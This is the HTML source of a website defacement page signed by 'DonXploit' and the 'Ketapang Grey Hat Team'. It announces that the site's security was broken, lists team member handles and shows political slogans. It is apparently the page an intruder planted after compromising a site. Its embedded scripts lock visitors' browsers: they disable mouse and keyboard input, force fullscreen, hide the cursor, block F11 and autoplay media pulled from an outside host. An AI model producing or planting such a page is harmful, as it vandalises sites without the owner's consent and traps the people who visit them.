<html>
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="title" content="MrVxdx1-Xploit WAS HERE">
    <meta name="description" content="Ketapang Grey Hat Team">
    <meta name="keywords" content="h4cked,deface,website,whitehat,defacer,hack,mirror, Ketapang grey hat team">
    <meta name="robots" content="index, follow">
    <meta name="revisit-after" content="60 days">
    <meta name="author" content="Drv7.ID">
    <title>H4cked by DonXploit</title>
    <meta property="og:image" content="https://kosred.com/a/otegg.jpg">
    <meta name="theme-color" content="#000">
    <link rel="icon" type="image/png" href="https://i.ibb.co/5xRnnV4/IMG-20231129-231748.jpg">
    <link href="https://fonts.googleapis.com/css?family=Acme" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Reggae+One&amp;display=swap" rel="stylesheet">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
  </head>
  <body bgcolor="white" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()">
  <style type="text/css">
      center {
        font-family: Acme;
      }
      img {
        opacity: 80%;
      }
      red {
        color: red;
      }
      #background-video {
        height: 100vh;
        width: 100vw;
        object-fit: cover;
        position: fixed;
        left: 0;
        right: 0;
        top: 0;
        bottom: 0;
        z-index: -1;
      }
      font {
        text-shadow: #000 0px 0px 3px;
        -webkit-font-smoothing: antialiased;
      }
      div {
        animation: glitch 1s linear infinite;
      }
      @keyframes glitch {
        2%,
        64% {
          transform: translate(2px, 0) skew(0deg);
        }
        4%,
        60% {
          transform: translate(-2px, 0) skew(0deg);
        }
        62% {
          transform: translate(0, 0) skew(5deg);
        }
      }
      div:before,
      div:after {
        content: attr(title);
        position: absolute;
        left: 0;
      }
      div:before {
        animation: glitchTop 1s linear infinite;
        clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
        -webkit-clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
      }
      @keyframes glitchTop {
        2%,
        64% {
          transform: translate(2px, -2px);
        }
        4%,
        60% {
          transform: translate(-2px, 2px);
        }
        62% {
          transform: translate(13px, -1px) skew(-13deg);
        }
      }
      div:after {
        animation: glitchBotom 1.5s linear infinite;
        clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
        -webkit-clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
      }
      @keyframes glitchBotom {
        2%,
        64% {
          transform: translate(-2px, 0);
        }
        4%,
        60% {
          transform: translate(-2px, 0);
        }
        62% {
          transform: translate(-22px, 5px) skew(21deg);
        }
      }
  </style>
<script language="JavaScript">
      window.onbeforeunload = confirmExit;
      function confirmExit() {
        return "are you sure ? wkwk";
      }
      function fs() {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
          elem.requestFullscreen();
        } else if (elem.msRequestFullscreen) {
          elem.msRequestFullscreen();
        } else if (elem.mozRequestFullScreen) {
          elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) {
          elem.webkitRequestFullscreen();
        }
        document.getElementById("body").style.cursor = 'none';
        document.onkeydown = function(e) {
          return false;
        }
        document.addEventListener("keydown", e => {
          if (e.key == "F11") e.preventDefault();
        });
      }
</script>
<script id="rendered-js">
document.addEventListener('DOMContentLoaded', function (event) {
  var dataText = ["Wh00pz ! your security get down !"];
  function typeWriter(text, i, fnCallback) {
    if (i < text.length) {
      document.getElementById("hekerabies").innerHTML = text.substring(0, i + 1);
      setTimeout(function () {
        typeWriter(text, i + 1, fnCallback);
      }, 150);
    }
    else if (typeof fnCallback == 'function') {
        setTimeout(fnCallback, 7000);
      }
  }
  function StartTextAnimation(i) {
    if (typeof dataText[i] == 'undefined') {
      setTimeout(function () {
        StartTextAnimation(0);
      }, 30000);
    }
    if (i < dataText[i].length) {
      typeWriter(dataText[i], 0, function () {
        StartTextAnimation(i + 1);
      });
    }
  }
  StartTextAnimation(0);
});
</script>
    <audio src="https://drvee07.github.io/pixel/videoplayback.m4a" autoplay="true" id="lagu" loop=""></audio>
    <video id="background-video" src="https://drvee07.github.io/pixel/videoplayback.webm" autoplay="" loop="" muted="" style="position: fixed;object-fit: cover;" poster="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII="><source src="https://drvee07.github.io/pixel/videoplayback.webm" type="video/webm">
    </video>
    <table width="100%" height="80%">
      <td>
        <center>
            <img border-radius="50%" src="https://i.ibb.co/5xRnnV4/IMG-20231129-231748.jpg" width="300" height="300">
            <font  face="Reggae One" color="red"><b><h1>DonXploit</h1></b>
            <p><b>[+] KETAPANG GREY HAT TEAM [+]</b></p></font>
            <font color="white">Bingungkan Mereka Dengan Diam Mu & Kejutkan Mereka Dengan Aksi MU!!
            <p><font color="red">$</font> Greetz <font color="red">$</font></p>KETAPANG GRAY HAT  -  FROM LAMMER TO MASTAH
            <p>| MrVxdx1-Xploit| Mr.Venom |DonXploit| HAZBOY | Mr.B1ng0 |Tn.Forbidden 404</marquee></p>
            <p>description: we are a team / organization that has little experience in the internet world</p>
            <p>#CyberMuslim - #SavePalestine - #FreePalestine</p>
            <p>[+] INDONESIAN HACKER RULES [+]</p></font>
        </center>
      </td>
    </table>
  </body>
  </html>
